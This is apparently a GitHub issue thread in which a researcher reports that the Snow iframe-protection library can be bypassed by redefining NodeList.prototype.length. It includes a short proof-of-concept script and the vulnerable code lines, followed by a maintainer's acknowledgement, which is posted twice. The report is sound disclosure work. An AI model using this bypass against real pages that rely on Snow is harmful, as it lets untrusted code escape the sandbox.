Snow can by bypassed with polluting NodeList.prototype.length

[terjanq]

PoC:

Object.defineProperty(NodeList.prototype, 'length', {value:0});
document.body.innerHTML = '<iframe name=iframe>';
iframe.alert(1337);

Vulnerable path:

1. getFramesArray called in

   snow/src/inserters.js

   Line 29 in 1c8faa8

   const frames = getFramesArray(element, false);

2. slice() called on the results from querySelectorAll in

   snow/src/utils.js

   Lines 111 to 113 in 1c8faa8

   	const list = querySelectorAll.call(element, 'iframe,frame,object,embed');
   	fillArrayUniques(frames, slice(list));

   produces an empty array because of the length 0.

[naugtur]

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.

[naugtur]

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.